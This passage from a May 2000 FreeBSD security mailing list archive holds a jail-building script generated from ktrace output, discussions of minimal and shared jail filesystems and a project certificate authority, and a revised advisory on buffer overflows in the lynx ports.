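        $3 == "RET"  { if ($0 !~ /errno/) for (i = 0; i < n; i++) print pend[i]; n = 0 }
        END          { for (i = 0; i < n; i++) print pend[i] }
    ' | LC_ALL=C sort -u
}

# jail_script JAILROOT: read a path list on stdin and print a shell script
# that recreates those paths under JAILROOT. Directories are recreated and
# regular files copied with their modes and times. Paths under /dev are only
# noted as comments: device nodes are created with mknod(8) by root on the
# host, and a jail normally wants very few of them.
jail_script() {
    root="$1"
    printf '#!/bin/sh\n# First draft generated from a ktrace run; review before running.\nset -e\n'
    printf 'J="%s"\n' "$root"
    printf 'install_path() {\n'
    printf '    if [ -d "$1" ]; then mkdir -p "$J$1"\n'
    printf '    else mkdir -p "$J$(dirname "$1")" && cp -p "$1" "$J$1"; fi\n'
    printf '}\n'
    while IFS= read -r p; do
        case "$p" in
        /dev/*) printf '# device node used: %s (mknod it on the host only if really needed)\n' "$p" ;;
        *)      printf 'install_path "%s"\n' "$p" ;;
        esac
    done
}

# Typical use on the host (ktrace -i follows children, -f names the trace file):
#   ktrace -i -f /tmp/sshd.trace /usr/sbin/sshd -d
#   kdump -f /tmp/sshd.trace | kdump_paths | jail_script /jail/sshd > build-jail.sh
# On the constructed sample, kdump_paths yields /dev/null, /etc/ssh/sshd_config
# and /lib/libc.so.4; the failed libcrypto probe and the relative lookup drop out.
```

As Robert notes further down the thread, a trace only catches the files that were used in that run, not the files that might be used, so the generated script is a starting point to review, not a finished jail.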
--
Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org


From owner-freebsd-security Wed May 17 09:42:44 2000
Date: Wed, 17 May 2000 12:41:49 -0400 (EDT)
From: Robert Watson
To: "Jacques A . Vidrine"
Cc: Geoffrey Robinson, security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?

On Wed, 17 May 2000, Jacques A . Vidrine wrote:

> On Wed, May 17, 2000 at 11:05:07AM -0400, Robert Watson wrote:
> > Jail works by:
> >
> > 1) Chrooting the child process
> > 2) Limiting the scope of superuser privileges accessible by uid0 processes
> >    in the jail
> 3) Limiting network access to a single IP address
>
> [snip]
> > Right now, each jail costs you the size of
> > world, and is hard to upgrade if you have any decent number of jails.
>
> You don't need the whole world depending on what you are doing. If a
> jail is setup for the purposes of a single application (which I expect
> is the most common scenario), you only need the files that support it.

I had a script that built a much-reduced world necessary for a simple
virtual server environment. As you suggest, it's possible to throw out
almost all of /sbin, substantial parts of {/bin,/usr/bin,/usr/sbin}, all of
/boot, /kernel, and so on. Many of these utilities are used for managing
hardware, the boot process, etc, and are not relevant in a restricted jail
environment. Sadly, my concise list of files got toasted with a lost
notebook hard disk, and I haven't had a chance to reproduce it yet. I
probably will at some point.

Even so, by the time you've thrown in a substantial /usr/lib and so on, you
still have a decent sized chunk that is identical across all jails. A
working read-only nullfs would substantially improve this problem. It also
improves the backup situation: I can require (and enforce) that all
jail-specific data be stored in {/etc,/local,/var} off of the jail root,
and not worry that by upgrading /usr I'm going to wipe out local files, and
know that my backups catch everything.

> Upgrading the jail is simple if you created a script to create the jail
> in the first place -- you re-run the script after upgrading the base
> system.

Simple, but costly. Imagine for a moment that you have 700 jails on a
single machine, and you'd like to be able to consistently announce to all
admins of all jails that a version upgrade is taking place on 5/16/2000,
and the downtime is one hour :-). I'd rather have a single file system
exported to all jails, saving space and time.

> For me the real problem with this scheme is producing the script for
> building a jail in the first place. I do it by hand. One of these days
> I'd like to try writing an application that can generate a first-draft
> script for building a jail, given a list of applications that need to
> run in the jail. I think it might be nifty to do this based on the
> output of a ktrace on the target applications during a test run.

I didn't have mine tuned quite that much, I just eliminated clearly
unnecessary things (dmesg, ipfw, ifconfig, ...). Clearly what you
eliminate depends a lot on what you want to do with the jail. You might
consider using some combination of nm and strings to pull out
dependencies, also. I had a tool at one point that caught all read and
write references to files during the boot process, which I was using to
determine appropriate file settings for securelevel. A similar idea for
jails would be a possibility, although that only catches the files that
were used, not the files that might be used :-).

> > Storing all that stuff in a single tree mapped read-only into jails would
> > solve that (you'd probably want two so you could upgrade one, test it, and
> > then swap to that for all jails so as to minimize downtime).
>
> I don't think you want this unless the purpose of your jail is to
> provide a `complete virtual server' for shell access et. al. I don't
> want e.g. `cc' or `sync' or most of the things in `/dev' to be available
> to a jailed process.

The majority of /dev is already not available, or there would be security
problems. :-) Again, I agree -- it's possible to substantially trim.
However, in the environment I'm looking at, 30mb per-jail wasted is a lot
of waste. With 700 jails, that's 2.1gb of wasted space (which needs to be
RAID for the jails to be reliable), and also 2.1gb of copied files for
each upgrade, opening a substantial time window for problems to occur. I'd
like to be able to (effectively) atomically upgrade a jail by shutting down
the jail, umounting its /usr reference, mounting the new /usr reference,
and restarting the jail. Needless to say, this would require two jail /usr
partitions, one that was to be moved in, one that would contain the old one
while the move was in progress.

> > I'll gather up my notes on possible improvements and post them to
> > -security sometime in the next week or two. Thanks!
>
> Yay, thanks Robert!

Robert N M Watson
robert@fledge.watson.org              http://www.watson.org/~robert/
PGP key fingerprint: AF B5 5F FF A6 4A 79 37  ED 5F 55 E9 58 04 6A B1
TIS Labs at Network Associates, Safeport Network Services


From owner-freebsd-security Wed May 17 10:06:42 2000
Date: Wed, 17 May 2000 19:07:38 +0200
From: "Morten Seeberg"
To: "Robert Watson" ,
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?

> One way to substantially improve jail scalability would be to allow the
> same (read-only) file system to be present in all jails as the root, with
> only jail-local data being modified. You can imagine gratuitously using

I haven't had time to play with jail, but according to what PHK said at a
seminar where he explained the jail functionality, you could have just one
filesystem and mount it via NFS.
From owner-freebsd-security Wed May 17 10:39:40 2000
Date: Wed, 17 May 2000 11:40:51 -0600
From: Wes Peters
Reply-To: security@FreeBSD.org
To: Robert Watson
Cc: Darren Reed, Peter Wemm, committers@FreeBSD.org, security@FreeBSD.org
Subject: Re: HEADS UP: New host key for freefall!

Robert Watson wrote:
>
> [previous material elided because we're in violent agreement]
>
> Now to address Wes's point: I don't believe SSH1 can do certification,
> although I don't know about SSH2.

Oh, I was referring to certificates for sending S/MIME email.

> At TIS, we have a DNSsec adaptation to
> store host keys in DNS securely, but the secure resolver for BIND9 wasn't
> done last I checked, meaning that an SSH client cannot automatically
> retrieve and verify the host key using DNSsec yet. DNSsec would really be
> an ideal way to distribute host keys for SSH, so I'll push on appropriate
> parties to see if we can finish it up some time soon (really depends on
> the Nominum/ISC folks).

We'll await news from you.

> I do agree that we need to do a CA, but as I've mentioned before, we need
> to do it *right* or not at all. This means a secure key storage
> mechanism/facility, offline signing key, etc, etc. Rather than grow our
> own, it might be easier (and more affordable) to sit on someone else's,
> unless BSDi has one already? Does anyone know anything about
> inter-cert-format certification? I.e., can an x.509 PKI root sign PGP
> keys in a useful way? Is it usefully verifiable in an automated way?

Not that I know of, unless you count sending the PGP keys in an S/MIME
message. I suspect that might be adequate for our needs, but will defer to
the expertise of our resident crypto-heads. My security expertise runs
more towards system configuration and protocol design.

> OpenSSL can handle CA behavior, but there are presumably commercial
> products that can do a much better job in terms to handling key splitting,
> etc. Some comparison shopping and communication

I'm not sure we'll be doing a large enough volume to warrant paying money
for CA services. I guess we'd have to work out a plan for what classes of
persons and/or positions we plan to issue keys/certs to in order to answer
that question. If we're talking about a CA cert, a cert for each of the
"hats", and a cert for each committer individually, that means right now
we'd need to manage about 210 certs, of which 5 or 6 need to be
transferable.

Plus, I really like the idea of a cert with "The FreeBSD Project" as the
CA. Are we not the most reliable source of information about FreeBSD?

Replies directed to -security, as this has grown out of the scope of
committers. (And because I don't want Sheldon to yell again. ;^)

--
"Where am I, and what am I doing in this handbasket?"

Wes Peters                                                   Softweyr LLC
wes@softweyr.com                                      http://softweyr.com/


From owner-freebsd-security Wed May 17 12:12:04 2000
Date: Wed, 17 May 2000 12:11:50 -0700 (PDT)
From: "Duane H. Hesser"
To: security@FreeBSD.ORG
Subject: Re: HEADS UP: New host key for freefall!

Sorry to bust in in the middle like this. This is the first message on this
topic I've seen, so I haven't seen the "previous material", thus the
comments/questions below may be irrelevant to the discussion at hand (if
so, please forgive the intrusion).

For some time, I have had an interest in SDSI (Simple Distributed Security
Infrastructure) by Ronald Rivest and Butler Lampson. It has a simple
elegance which appeals to me, although I have not yet had much opportunity
to work with it. Would this infrastructure be of interest in your current
discussion?

For those who are not familiar with it yet, the following links may be of
interest:

http://theory.lcs.mit.edu/~rivest/sdsi10.html
(just scan the Overview to get the concept)

The "top" page, from which distributions and related papers may be
accessed is

http://theory.lcs.mit.edu/~cis/sdsi.html

SDSI has been integrated with SPKI in the past year or so; there's even a
Java implementation for those inclined in that direction.

If this is out of scope for your current discussion, I'd still be
interested in hearing comments (positive or negative) from anyone
inclined.

Now back to your regularly scheduled programming...

On 17-May-00 Wes Peters wrote:
> Robert Watson wrote:
>>
>> [previous material elided because we're in violent agreement]
>>
>> Now to address Wes's point: I don't believe SSH1 can do certification,
>> although I don't know about SSH2.
>
> Oh, I was referrering to certificates for sending S/MIME email.
>
>> At TIS, we have a DNSsec adaptation to
>> store host keys in DNS securely, but the secure resolver for BIND9 wasn't
>> done last I checked, meaning that an SSH client cannot automatically
>> retrieve and verify the host key using DNSsec yet. DNSsec would really be
>> an ideal way to distribute host keys for SSH, so I'll push on appropriate
>> parties to see if we can finish it up some time soon (really depends on
>> the Nominum/ISC folks).
>
> We'll await news from you.
>
>> I do agree that we need to do a CA, but as I've mentioned before, we need
>> to do it *right* or not at all. This means a secure key storage
>> mechanism/facility, offline signing key, etc, etc. Rather than grow our
>> own, it might be easier (and more affordable) to sit on someone else's,
>> unless BSDi has one already? Does anyone know anything about
>> inter-cert-format certification? I.e., can an x.509 PKI root sign PGP
>> keys in a useful way? Is it usefully verifiable in an automated way?
>
> Not that I know of, unless you count sending the PGP keys in an S/MIME
> message. I suspect that might be adequate for our needs, but will defer
> to the expertise of our resident crypto-heads. My security expertise
> runs more towards system configuration and protocol design.
>
>> OpenSSL can handle CA behavior, but there are presumably commercial
>> products that can do a much better job in terms to handling key splitting,
>> etc. Some comparison shopping and communication
>
> I'm not sure we'll be doing a large enough volume to warrant paying money
> for CA services. I guess we'd have to work out a plan for what classes
> of persons and/or positions we plan to issue keys/certs to in order to
> answer that question. If we're talking about a CA cert, a cert for each
> of the "hats", and a cert for each committer individually, that means
> right now we'd need to manage about 210 certs, of which 5 or 6 need to
> be transferrable.
>
> Plus, I really like the idea of a cert with "The FreeBSD Project" as the
> CA. Are we not the most reliable source of information about FreeBSD?
>
> Replies directed to -security, as this has grown out of the scope of
> committers. (And because I don't want Sheldon to yell again. ;^)
>
> --
> "Where am I, and what am I doing in this handbasket?"
>
> Wes Peters                                                   Softweyr LLC
> wes@softweyr.com                                      http://softweyr.com/

--------------
Duane H.
Hesser dhh@androcles.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 12:51:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id EFBFB37BCB4; Wed, 17 May 2000 12:51:24 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id PAA15001; Wed, 17 May 2000 15:51:16 -0400 (EDT) (envelope-from wollman) Date: Wed, 17 May 2000 15:51:16 -0400 (EDT) From: Garrett Wollman Message-Id: <200005171951.PAA15001@khavrinen.lcs.mit.edu> To: Kris Kennaway Cc: Robert Watson , Wes Peters , Peter Wemm , security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > On Wed, 17 May 2000, Robert Watson wrote: >> I do agree that we need to do a CA, but as I've mentioned before, we need >> to do it *right* or not at all. This means a secure key storage >> mechanism/facility, offline signing key, etc, etc. Rather than grow our >> own, it might be easier (and more affordable) to sit on someone else's, >> unless BSDi has one already? > Agreed. I think it's important to consider that the level of effort required to implement maximal assurance may not necessarily be appropriate for this project. (It certainly isn't appropriate for my organization, and we have 500 people on staff and 6 people working full-time on {sys,net}admin.) >> Does anyone know anything about inter-cert-format certification? >> I.e., can an x.509 PKI root sign PGP keys in a useful way? Is it >> usefully verifiable in an automated way? > In principle this can be done by extracting a PGP key from the X.509 > certificate since (AFAIK) it contains (can contain) all of the required > bits. 
I'm not sure if something more direct has been standardized, though. It would be much easier to simply use an X.509 object signing tool to sign the canonicalized PGP key, and vice versa. Or, alternatively, dispense with one of the technologies entirely. X.509 for privacy-enhanced mail appears to be effectively dead, and has been for some time. >> I've been pushing on PGP, Inc (my employer) to ship a native FreeBSD >> version of PGP, not just Linux+everythingelseintheworld, but they push >> back that they've received none (zero) requests for a FreeBSD port. Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so they really don't care whether the commercial product exists or not. I use GnuPG, personally, since then I don't have to worry about any licensing issues at all. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13: 9:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 82C7B37BC82; Wed, 17 May 2000 13:09:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA86571; Wed, 17 May 2000 13:09:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 17 May 2000 13:09:32 -0700 (PDT) From: Kris Kennaway To: security@freebsd.org Cc: Robert Watson , Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! 
In-Reply-To: <3922D9A3.9EEC6033@softweyr.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 17 May 2000, Wes Peters wrote:

> > Now to address Wes's point: I don't believe SSH1 can do certification,
> > although I don't know about SSH2.
>
> Oh, I was referring to certificates for sending S/MIME email.

In theory PKI can do everything [*]: S/MIME email, PGP signatures, signed SSH hostkeys so you don't have to explicitly verify the new key through out-of-band trusted channels, SSL certificates for secure web services, etc. In theory these formats should all be pretty inter-convertible, since they all contain "enough crypto" (packaged in different ways) to make a decent protocol happy.

> I'm not sure we'll be doing a large enough volume to warrant paying money
> for CA services. I guess we'd have to work out a plan for what classes
> of persons and/or positions we plan to issue keys/certs to in order to
> answer that question. If we're talking about a CA cert, a cert for each
> of the "hats", and a cert for each committer individually, that means
> right now we'd need to manage about 210 certs, of which 5 or 6 need to
> be transferable.

The point of a PKI is that you can have a *single* trusted root certificate with all others signed by that one in a hierarchy. In order to root the tree in something which (e.g.) Netscape browsers will automatically understand, we'd need to have at least one key signed by a commercial CA (Verisign, Thawte, ..) which is used as the basis for the FreeBSD PKI, but there's no inherent need for more than one "purchased" certificate.

> Plus, I really like the idea of a cert with "The FreeBSD Project" as the
> CA. Are we not the most reliable source of information about FreeBSD?
Certified signatures are not about verifying the information content of data; they're about verifying the integrity of the message and the authenticity of the signing key.

Kris

[*] See however http://www.counterpane.com/pki-risks.html

----
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Wed May 17 13:17:21 2000
Delivered-To: freebsd-security@freebsd.org
Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id F1F6B37BCC9; Wed, 17 May 2000 13:17:14 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu)
Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id QAA26098; Wed, 17 May 2000 16:17:13 -0400 (EDT) (envelope-from wollman)
Date: Wed, 17 May 2000 16:17:13 -0400 (EDT)
From: Garrett Wollman
Message-Id: <200005172017.QAA26098@khavrinen.lcs.mit.edu>
To: Kris Kennaway
Cc: security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm
Subject: Re: HEADS UP: New host key for freefall!
In-Reply-To:
References: <3922D9A3.9EEC6033@softweyr.com>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

< said:

> The point of a PKI is that you can have a *single* trusted root
> certificate with all others signed by that one in a hierarchy. In order to
> root the tree in something which (e.g.) Netscape browsers will
> automatically understand, we'd need to have at least one key signed by a
> commercial CA (Verisign, Thawte, ..)

...who are generally unwilling to sign CA certificates, and when they are, charge very large sums of money to do so. This is why most organizations which use X.509 for internal authentication purposes run their own CAs and deploy customized Web-browser installations which come with the appropriate CA certs preinstalled.
(My employer, which owns tens of thousands of computers and has almost as many employees, does this. People who install the ``latest and greatest'' browser from wherever don't get support.)

-GAWollman

From owner-freebsd-security Wed May 17 13:26:30 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B7DD37BD62; Wed, 17 May 2000 13:26:24 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA89256; Wed, 17 May 2000 13:26:24 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Wed, 17 May 2000 13:26:23 -0700 (PDT)
From: Kris Kennaway
To: "Duane H. Hesser"
Cc: security@FreeBSD.ORG
Subject: Re: HEADS UP: New host key for freefall!
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 17 May 2000, Duane H. Hesser wrote:

> Sorry to bust in in the middle like this. This is the first message
> on this topic I've seen, so I haven't seen the "previous material",
> thus the comments/questions below may be irrelevant to the discussion
> at hand (if so, please forgive the intrusion).

It spilled over from a discussion on -committers which went off-topic. We were talking about the benefits and obstacles to establishing a FreeBSD CA for "project use".

> For some time, I have had an interest in SDSI (Simple Distributed
> Security Infrastructure) by Ronald Rivest and Butler Lampson. It
> has a simple elegance which appeals to me, although I have not yet
> had much opportunity to work with it.
>
> Would this infrastructure be of interest in your current discussion?
Frankly, there's no shortage of proposals for a public-key infrastructure flying around the internet, so I'm not sure what the particular benefits of this one are :-) Plus, the license on the software disallows commercial use, which means it can't be integrated into FreeBSD as part of a larger infrastructure :-/

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Wed May 17 13:26:32 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [209.98.143.44]) by hub.freebsd.org (Postfix) with ESMTP id 0AF8A37BCC9; Wed, 17 May 2000 13:26:26 -0700 (PDT) (envelope-from nectar@nectar.com)
Received: from bone.nectar.com (bone.nectar.com [10.0.1.105]) by gw.nectar.com (Postfix) with ESMTP id 5AAC09B10; Wed, 17 May 2000 15:26:22 -0500 (CDT)
Received: by bone.nectar.com (Postfix, from userid 1001) id B53401DAB; Wed, 17 May 2000 15:26:21 -0500 (CDT)
Date: Wed, 17 May 2000 15:26:21 -0500
From: "Jacques A . Vidrine"
To: Robert Watson
Cc: security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
Message-ID: <20000517152621.A48218@bone.nectar.com>
References: <20000517110758.C6884@bone.nectar.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: ; from rwatson@freebsd.org on Wed, May 17, 2000 at 12:41:49PM -0400
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, May 17, 2000 at 12:41:49PM -0400, Robert Watson wrote:

> Simple, but costly. Imagine for a moment that you have 700 jails on a
> single machine, and you'd like to be able to consistently announce to all
> admins of all jails that a version upgrade is taking place on 5/16/2000,
> and the downtime is one hour :-).
> I'd rather have a single file system
> exported to all jails, saving space and time.

For a jail running apache+php+ssl (a fairly complex application), I have ~3.4 MB of files from the base system (35 files). This isn't very large. One need only store the file once per filesystem (hard links).

> I didn't have mine tuned quite that much, I just eliminated clearly
> unnecessary things (dmesg, ipfw, ifconfig, ...). Clearly what you
> eliminate depends a lot on what you want to do with the jail.

I think this is backwards ... one should include in the jail only what is needed, rather than eliminate things that are apparently unneeded.

> A similar idea for jails would be a possibility, although that only
> catches the files that were used, not the files that might be used
> :-).

Yep, determining all the paths that an arbitrary application might access is NP-complete :-) But I think an excellent start could be generated by looking at what namei translations are done on behalf of a given process.

> I'd like to be
> able to (effectively) atomically upgrade a jail by shutting down the jail,
> umounting its /usr reference, mounting the new /usr reference, and
> restarting the jail.

Yes, I think this is the best solution if (a) one has dozens of jails, (b) the requirements of all of them are identical, and (c) the number of files that are to be `shared' among the jails is large. e.g. a public access unix system for web hosting or other. I guess in the latter case, one has to be happy with local NFS mounts at the moment, since VFS layering is, I believe, still buggy.
--
Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org

From owner-freebsd-security Wed May 17 13:30:48 2000
Delivered-To: freebsd-security@freebsd.org
Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0DF9437BCE8; Wed, 17 May 2000 13:30:46 -0700 (PDT) (envelope-from kris@FreeBSD.org)
Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA89882; Wed, 17 May 2000 13:30:46 -0700 (PDT) (envelope-from kris@FreeBSD.org)
X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs
Date: Wed, 17 May 2000 13:30:45 -0700 (PDT)
From: Kris Kennaway
To: Garrett Wollman
Cc: security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm
Subject: Re: HEADS UP: New host key for freefall!
In-Reply-To: <200005172017.QAA26098@khavrinen.lcs.mit.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 17 May 2000, Garrett Wollman wrote:

> > The point of a PKI is that you can have a *single* trusted root
> > certificate with all others signed by that one in a hierarchy. In order to
> > root the tree in something which (e.g.) Netscape browsers will
> > automatically understand, we'd need to have at least one key signed by a
> > commercial CA (Verisign, Thawte, ..)
>
> ...who are generally unwilling to sign CA certificates, and when they
> are, charge very large sums of money to do so. This is why most

Hmm, I didn't think of this.

> organizations which use X.509 for internal authentication purposes
> run their own CAs and deploy customized Web-browser installations
> which come with the appropriate CA certs preinstalled. (My employer,
> which owns tens of thousands of computers and has almost as many
> employees, does this.
> People who install the ``latest and greatest''
> browser from wherever don't get support.)

We could implement this without too much trouble by shipping the root cert on CD with FreeBSD releases (and having some kind of online distribution method, perhaps signed by a bunch of PGP keys) and instructing people on how to load it into netscape (if it were to be used for https purposes). Perhaps we could even make the netscape port pre-load it - we already have the infrastructure for customizing netscape prior to use.

Kris

----
In God we Trust -- all others must submit an X.509 certificate.
-- Charles Forsythe

From owner-freebsd-security Wed May 17 13:45:23 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail.wzrd.com (mail.wzrd.com [206.99.165.3]) by hub.freebsd.org (Postfix) with ESMTP id 0F64837BD94 for ; Wed, 17 May 2000 13:45:21 -0700 (PDT) (envelope-from danh@wzrd.com)
Received: by mail.wzrd.com (Postfix, from userid 91) id 79FDB5D053; Wed, 17 May 2000 16:45:19 -0400 (EDT)
Date: Wed, 17 May 2000 16:45:19 -0400
From: Dan Harnett
To: "Jacques A . Vidrine"
Cc: freebsd-security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
Message-ID: <20000517164519.A79630@mail.wzrd.com>
References: <20000517110758.C6884@bone.nectar.com> <20000517152621.A48218@bone.nectar.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0.1i
In-Reply-To: <20000517152621.A48218@bone.nectar.com>; from n@nectar.com on Wed, May 17, 2000 at 03:26:21PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello,

On Wed, May 17, 2000 at 03:26:21PM -0500, Jacques A . Vidrine wrote:
> On Wed, May 17, 2000 at 12:41:49PM -0400, Robert Watson wrote:
> > Simple, but costly.
> > Imagine for a moment that you have 700 jails on a
> > single machine, and you'd like to be able to consistently announce to all
> > admins of all jails that a version upgrade is taking place on 5/16/2000,
> > and the downtime is one hour :-). I'd rather have a single file system
> > exported to all jails, saving space and time.
>
> For a jail running apache+php+ssl (a fairly complex application), I
> have ~3.4 MB of files from the base system (35 files). This isn't
> very large. One need only store the file once per filesystem (hard
> links).

Isn't there a downside to that as well? Unless the files are read-only, if one jail should get compromised any common shared files could actually lead to holes in the remaining jails. An example being a modified sshd or telnetd.

--
Dan Harnett
Wizard Communication Systems, Inc. Email: danh@wzrd.com
2 Main Street Phone: (716) 743-0091
Tonawanda, NY 14150

From owner-freebsd-security Wed May 17 13:50:57 2000
Delivered-To: freebsd-security@freebsd.org
Received: from gw.nectar.com (gw.nectar.com [209.98.143.44]) by hub.freebsd.org (Postfix) with ESMTP id 1EA6037BCD0 for ; Wed, 17 May 2000 13:50:54 -0700 (PDT) (envelope-from nectar@nectar.com)
Received: from bone.nectar.com (bone.nectar.com [10.0.1.105]) by gw.nectar.com (Postfix) with ESMTP id BB6AF9B10; Wed, 17 May 2000 15:50:49 -0500 (CDT)
Received: by bone.nectar.com (Postfix, from userid 1001) id 67BFC1DAB; Wed, 17 May 2000 15:50:49 -0500 (CDT)
Date: Wed, 17 May 2000 15:50:49 -0500
From: "Jacques A . Vidrine"
To: Dan Harnett
Cc: freebsd-security@freebsd.org
Subject: Re: Jail: Problems? Proper Usage? Status? Practicality?
Message-ID: <20000517155049.B48295@bone.nectar.com>
Mail-Followup-To: "Jacques A . Vidrine" , Dan Harnett , freebsd-security@freebsd.org
References: <20000517110758.C6884@bone.nectar.com> <20000517152621.A48218@bone.nectar.com> <20000517164519.A79630@mail.wzrd.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2i
In-Reply-To: <20000517164519.A79630@mail.wzrd.com>; from danh@wzrd.com on Wed, May 17, 2000 at 04:45:19PM -0400
X-Url: http://www.nectar.com/
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, May 17, 2000 at 04:45:19PM -0400, Dan Harnett wrote:

> Isn't there a downside to that as well? Unless the files are read-only, if
> one jail should get compromised any common shared files could actually lead to
> holes in the remaining jails. An example being a modified sshd or telnetd.

The assumption is that the files _are_ read-only, or even better, schg.

--
Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org

From owner-freebsd-security Wed May 17 14:37: 7 2000
Delivered-To: freebsd-security@freebsd.org
Received: by hub.freebsd.org (Postfix, from userid 758) id B2AC537BCC0; Wed, 17 May 2000 14:36:49 -0700 (PDT)
From: FreeBSD Security Officer
Subject: FreeBSD Security Advisory: FreeBSD-SA-00:08.lynx [REVISED]
Reply-To: security-officer@freebsd.org
From: FreeBSD Security Officer
Message-Id: <20000517213649.B2AC537BCC0@hub.freebsd.org>
Date: Wed, 17 May 2000 14:36:49 -0700 (PDT)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-00:08 Security Advisory
FreeBSD, Inc.

Topic: Lynx ports contain numerous buffer overflows

Category: ports
Module: lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current
Announced: 2000-03-15
Revised: 2000-05-17
Affects: Ports collection before the correction date.
Corrected: 2000-04-16 [lynx-current]
2000-04-21 [lynx]
FreeBSD only: NO

I. Background

Lynx is a popular text-mode WWW browser, available in several versions including SSL support and Japanese language localization.

II. Problem Description

Versions of the lynx software prior to version 2.8.3pre.5 were written in a very insecure style and contain numerous potential and several proven security vulnerabilities (publicized on the BugTraq mailing list) exploitable by a malicious server.

The lynx ports are not installed by default, nor are they "part of FreeBSD" as such: they are part of the FreeBSD ports collection, which contains over 3200 third-party applications in a ready-to-install format. FreeBSD makes no claim about the security of these third-party applications, although an effort is underway to provide a security audit of the most security-critical ports.

III. Impact

A malicious server which is visited by a user with the lynx browser can exploit the browser security holes in order to execute arbitrary code as the local user.

If you have not chosen to install any of the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports/packages, then your system is not vulnerable.

IV. Workaround

Remove the lynx/lynx-current/lynx-ssl/ja-lynx/ja-lynx-current ports, if you have installed them.

V. Solution

Upgrade to lynx or lynx-current after the correction date.

After the initial release of this advisory, the Lynx development team conducted an audit of the source code, and have corrected the known vulnerabilities in lynx as well as increasing the robustness of the string-handling code. As of lynx-2.8.3pre.5, we consider it safe enough to use again. Note that there may be undiscovered vulnerabilities remaining in the code, as with all software - but should any further vulnerabilities be discovered a new advisory will be issued.
